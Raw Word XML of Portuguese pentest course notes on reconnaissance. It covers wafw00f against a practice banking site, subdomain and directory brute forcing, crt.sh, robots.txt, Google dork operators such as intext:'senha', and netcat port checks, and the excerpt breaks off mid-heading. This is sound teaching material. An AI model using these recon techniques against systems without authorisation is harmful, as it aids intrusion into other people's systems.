      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Wordlists fonte: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/danielmiessler/SecLists</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6511BB45" w14:textId="77777777" w:rsidR="00331B09" w:rsidRPr="00711C8C" w:rsidRDefault="00331B09" w:rsidP="00331B09">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="063BDBD7" w14:textId="13EEC9A5" w:rsidR="009D3EFD" w:rsidRPr="00711C8C" w:rsidRDefault="007A6108" w:rsidP="0035766A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>É interessante fazer o bom uso para descobrir ainda mais IPs sobre a aplicação</w:t>
      </w:r>
      <w:r w:rsidR="00A13FC6" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> e seu range de cada IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0602F42C" w14:textId="77777777" w:rsidR="00D92C8C" w:rsidRPr="00711C8C" w:rsidRDefault="00D92C8C" w:rsidP="0035766A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B7257E3" w14:textId="65BB8F32" w:rsidR="009D3EFD" w:rsidRPr="00711C8C" w:rsidRDefault="009D3EFD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Para saber se tem um firewall por trás da aplicação ou se o IP, é um IP Real:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F726F0D" w14:textId="4A0E078A" w:rsidR="009D3EFD" w:rsidRPr="00711C8C" w:rsidRDefault="009D3EFD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ab/>
        <w:t xml:space="preserve">Pode-se usar a ferramenta: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wafw00f</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>http://www.bancocn.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F7DA314" w14:textId="7F416517" w:rsidR="009D3EFD" w:rsidRPr="00711C8C" w:rsidRDefault="007A6108" w:rsidP="009D3EFD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IPv4 e IPv6 são a mesma coisa, a diferença que o IPv6 é a versão nova do </w:t>
      </w:r>
      <w:r w:rsidR="0062646A" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>protocolo de Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F19D817" w14:textId="77777777" w:rsidR="00DD16A3" w:rsidRPr="00711C8C" w:rsidRDefault="00DD16A3" w:rsidP="009D3EFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="402FFA4A" w14:textId="7695A5AA" w:rsidR="008B4E0C" w:rsidRPr="00B007BE" w:rsidRDefault="008B4E0C" w:rsidP="008B4E0C">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc156597587"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subdomínios:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6601554E" w14:textId="5C327690" w:rsidR="008B4E0C" w:rsidRPr="00711C8C" w:rsidRDefault="008B4E0C" w:rsidP="008B4E0C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16FB5B5D" w14:textId="7D1EC52E" w:rsidR="008B4E0C" w:rsidRPr="00711C8C" w:rsidRDefault="008B4E0C" w:rsidP="008B4E0C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Pode-se fazer </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Brute Force</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> de subdomínios</w:t>
      </w:r>
      <w:r w:rsidR="006B18CF" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DNS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, as vezes ele pode não ter um Firewall Web e pode descobrir o IP real da aplicação. Existe a ferramenta na web: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">crt.sh </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Faz a busca de subdomínios por transparência de certificado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207F7C96" w14:textId="55DB382B" w:rsidR="006B18CF" w:rsidRPr="00711C8C" w:rsidRDefault="006B18CF" w:rsidP="008B4E0C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5606B3DE" w14:textId="14359E90" w:rsidR="006B18CF" w:rsidRPr="00B007BE" w:rsidRDefault="006B18CF" w:rsidP="006B18CF">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc156597588"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Directories:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="6810AF96" w14:textId="632CECF3" w:rsidR="006B18CF" w:rsidRPr="00711C8C" w:rsidRDefault="006B18CF" w:rsidP="006B18CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D8B0FDA" w14:textId="0F5589A1" w:rsidR="006B18CF" w:rsidRPr="00711C8C" w:rsidRDefault="006B18CF" w:rsidP="006B18CF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Pode-se usar suas próprias ferramentas para brute force de diretórios. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EE530E" w14:textId="76375FDD" w:rsidR="00CC12BF" w:rsidRPr="00711C8C" w:rsidRDefault="00CC12BF" w:rsidP="001A511E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45659F51" w14:textId="7C748DDD" w:rsidR="00F16C3B" w:rsidRPr="00B007BE" w:rsidRDefault="003053B9" w:rsidP="003053B9">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc156597589"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google Hacking:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="1E73498E" w14:textId="684C93BB" w:rsidR="003053B9" w:rsidRPr="00711C8C" w:rsidRDefault="003053B9" w:rsidP="003053B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CCC63C5" w14:textId="5F8D9FB5" w:rsidR="006B18CF" w:rsidRPr="00711C8C" w:rsidRDefault="006B18CF" w:rsidP="003053B9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É muito importante usar o google na etapa de Footprinting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5734C1C3" w14:textId="1E8E3645" w:rsidR="006B18CF" w:rsidRPr="00711C8C" w:rsidRDefault="006B18CF" w:rsidP="003053B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C4BDD2" w14:textId="62023536" w:rsidR="006B18CF" w:rsidRPr="00711C8C" w:rsidRDefault="006B18CF" w:rsidP="003053B9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Você pode ir no site alvo e procurar pelo arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>robots.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00094E75" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00094E75" w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>http://bancocn.com/robots.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00094E75" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>), esse arquivo na aplicação diz aos buscadores do google para</w:t>
      </w:r>
      <w:r w:rsidR="00094E75" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> não indexar </w:t>
      </w:r>
      <w:r w:rsidR="00094E75" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>o diretório</w:t>
      </w:r>
      <w:r w:rsidR="00A72B29" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostrado</w:t>
      </w:r>
      <w:r w:rsidR="00094E75" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> dentro do arquivo.</w:t>
      </w:r>
      <w:r w:rsidR="00A72B29" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Porém, vai afirmar que ele existe e pode tentar acessa-lo na web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6CC479" w14:textId="0265F416" w:rsidR="00E962E5" w:rsidRPr="00711C8C" w:rsidRDefault="00E962E5" w:rsidP="000B0B6C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29CCFFF2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site:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Limita a pesquisa a um site ou domínio específico. Por exemplo, site:wikipedia.org procurará apenas no site da Wikipedia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3883B6F0" w14:textId="77777777" w:rsidR="000B0B6C" w:rsidRPr="00711C8C" w:rsidRDefault="000B0B6C" w:rsidP="000B0B6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300DEEBA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intitle:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Localiza páginas com um título específico. Por exemplo, intitle:"página de login" procurará páginas com "página de login" no título.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218C31BC" w14:textId="77777777" w:rsidR="000B0B6C" w:rsidRPr="00711C8C" w:rsidRDefault="000B0B6C" w:rsidP="000B0B6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A5CBCCF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inurl:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Encontra URLs que contenham uma palavra-chave específica. Por exemplo, inurl:admin procurará URLs com "admin" na estrutura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C41DEC" w14:textId="77777777" w:rsidR="000B0B6C" w:rsidRPr="00711C8C" w:rsidRDefault="000B0B6C" w:rsidP="000B0B6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68BCE6EF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filetype:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Limita a pesquisa a arquivos de um tipo específico. Por exemplo, filetype:pdf procurará apenas arquivos PDF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F456EF" w14:textId="77777777" w:rsidR="000B0B6C" w:rsidRPr="00711C8C" w:rsidRDefault="000B0B6C" w:rsidP="000B0B6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B7EF30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related:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Localiza sites relacionados a um site específico. Por exemplo, related:example.com encontrará sites relacionados ao exemplo.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5FA82D" w14:textId="77777777" w:rsidR="000B0B6C" w:rsidRPr="00711C8C" w:rsidRDefault="000B0B6C" w:rsidP="000B0B6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC3B8D6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cache:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Exibe a versão em cache de uma página da web. Por exemplo, cache:example.com mostrará a versão em cache do site example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B96D88F" w14:textId="77777777" w:rsidR="000B0B6C" w:rsidRPr="00711C8C" w:rsidRDefault="000B0B6C" w:rsidP="000B0B6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FED8AA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link:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Localiza páginas que contêm links para uma URL específica. Por exemplo, link:example.com encontrará páginas que têm links para example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCACF32" w14:textId="77777777" w:rsidR="000B0B6C" w:rsidRPr="00711C8C" w:rsidRDefault="000B0B6C" w:rsidP="000B0B6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427B780C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info:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Fornece informações sobre um site específico. Por exemplo, info:example.com mostrará informações sobre o site example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B937C2" w14:textId="77777777" w:rsidR="000B0B6C" w:rsidRPr="00711C8C" w:rsidRDefault="000B0B6C" w:rsidP="000B0B6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9CC751" w14:textId="77777777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intext:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Procura por texto dentro do corpo de uma página da web. Por exemplo, intext:"senha" procurará páginas que contenham a palavra "senha".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02977753" w14:textId="77777777" w:rsidR="000B0B6C" w:rsidRPr="00711C8C" w:rsidRDefault="000B0B6C" w:rsidP="000B0B6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5083073F" w14:textId="07C9593D" w:rsidR="000B0B6C" w:rsidRPr="00711C8C" w:rsidRDefault="000B0B6C" w:rsidP="000B0B6C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allintext:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Procura por todas as palavras especificadas no texto da página. Por exemplo, allintext:"nome de usuário senha" encontrará páginas que contêm ambas as palavras "nome de usuário" e "senha".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C763A9C" w14:textId="7B47F992" w:rsidR="00E962E5" w:rsidRPr="00B007BE" w:rsidRDefault="00E962E5" w:rsidP="00E962E5">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc156597590"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aula 5 – Reconhecimento com Nmap – Analisando o alvo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="0A3F6032" w14:textId="7333A799" w:rsidR="00E962E5" w:rsidRPr="00711C8C" w:rsidRDefault="00E962E5" w:rsidP="00E962E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB181F0" w14:textId="511F941B" w:rsidR="00997519" w:rsidRPr="00B007BE" w:rsidRDefault="00997519" w:rsidP="00422252">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc156597591"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enumeração de serviços</w:t>
      </w:r>
      <w:r w:rsidR="00422252" w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (PORT SCANNING)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="07A2E2E9" w14:textId="0EE7B979" w:rsidR="00997519" w:rsidRPr="00711C8C" w:rsidRDefault="00997519" w:rsidP="00E962E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AC30C9A" w14:textId="32FDCE02" w:rsidR="00997519" w:rsidRPr="00711C8C" w:rsidRDefault="00997519" w:rsidP="00E962E5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Quando você acessa o site pelo navegador, na verdade você está acessando o serviço HTTP que por padrão é a porta 80</w:t>
      </w:r>
      <w:r w:rsidR="00CF7009" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>, conexão TCP.</w:t>
      </w:r>
      <w:r w:rsidR="00C56E7F" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Há 65536 portas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1E00D6" w14:textId="71C0DC86" w:rsidR="00FE2351" w:rsidRPr="00711C8C" w:rsidRDefault="00FE2351" w:rsidP="00E962E5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No terminal, há uma ferramenta chamada </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Net</w:t>
      </w:r>
      <w:r w:rsidR="004A3E3F" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>at (nc)</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> que permite que criamos conexões TCP/UDP, envia requisições ao servidor em uma determinada porta.</w:t>
      </w:r>
      <w:r w:rsidR="00F92120" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Permite saber se alguma porta está aberta ou não, dependendo da resposta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B43F335" w14:textId="49C23BB3" w:rsidR="00FE2351" w:rsidRPr="00711C8C" w:rsidRDefault="00FE2351" w:rsidP="00E962E5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Sintaxe:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> nc IP PORTA</w:t>
      </w:r>
      <w:r w:rsidR="00ED2406" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B790DDB" w14:textId="2E155D81" w:rsidR="00ED2406" w:rsidRPr="00711C8C" w:rsidRDefault="00ED2406" w:rsidP="00E962E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B0FAA1" w14:textId="38EFF7B1" w:rsidR="00ED2406" w:rsidRPr="00711C8C" w:rsidRDefault="00ED2406" w:rsidP="00E962E5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Não necessariamente irá ter serviços HTTP rodando na porta 80, pode ter serviços rodando na porta 20, porta 200. Assim como, HTTPS na porta 443.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FE1E6F" w14:textId="77E2800E" w:rsidR="00A676A0" w:rsidRPr="00711C8C" w:rsidRDefault="00A676A0" w:rsidP="00E962E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4757A354" w14:textId="480A6308" w:rsidR="00A676A0" w:rsidRPr="00B007BE" w:rsidRDefault="00A676A0" w:rsidP="00D26A8F">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc156597592"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
